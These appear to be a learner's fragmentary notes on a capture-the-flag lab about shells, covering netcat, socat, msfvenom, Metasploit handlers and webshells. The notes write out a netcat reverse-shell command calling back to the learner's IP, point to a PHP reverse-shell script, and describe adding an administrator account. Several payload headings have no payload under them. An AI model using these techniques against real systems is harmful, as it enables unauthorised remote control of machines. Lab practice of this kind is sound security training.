What the shell?
February 07, 2024
Last updated
February 07, 2024
Last updated
Task 1: What is a shell?
Task 2: Tools
Task 3: Types of shell
Task 4: Netcat
Task 5: Netcat Shell Stabilisation
Task 6: Socat
Task 7: Socat Encrypted Shells
Task 8: Common Shell Payloads
Task 9: mfsvenom
Task 10: Metasploit multi/handler
Task 11: WebShells
Task 12: Next Steps
Task 13: Practice and Examples
Try uploading a webshell to the Linux box, then use the command: nc <LOCAL-IP> <PORT> -e /bin/bash
to send a reverse shell back to a waiting listener on your own machine.
Navigate to /usr/share/webshells/php/php-reverse-shell.php
in Kali and change the IP and port to match your tun0 IP with a custom port. Set up a netcat listener, then upload and activate the shell.
Log into the Linux machine over SSH using the credentials in task 14. Use the techniques in Task 8 to experiment with bind and reverse netcat shells.
ORRRRRRRRRRRRRRRRRRRRRR
Practice reverse and bind shells using Socat on the Linux machine. Try both the normal and special techniques.
Use a listener to the victim's machine and use exec command
Connect to the victime machine using socat and specify the port
First python reverse shell
Second bash reverse shell
Third perl reverse shell
Switch to the Windows VM. Try uploading and activating the php-reverse-shell
. Does this work?
Powershell reverse shell
Webshell php reverse shell
Put this code into url
Kahit idelete file basta nasa loob na tapos need lang ma end task ng admin sa task manager para mawala
The webserver is running with SYSTEM privileges. Create a new user and add it to the "administrators" group, then login over RDP or WinRM.
Create a 64bit Windows Meterpreter shell using msfvenom and upload it to the Windows Target. Activate the shell and catch it with multi/handler. Experiment with the features of this shell.
Create both staged and stageless meterpreter shells for either target. Upload and manually activate them, catching the shell with netcat -- does this work?
STAGELESS REVERSE SHELL
Look through and try some of the other reverse shell techniques. Try to analyse them and see why they work.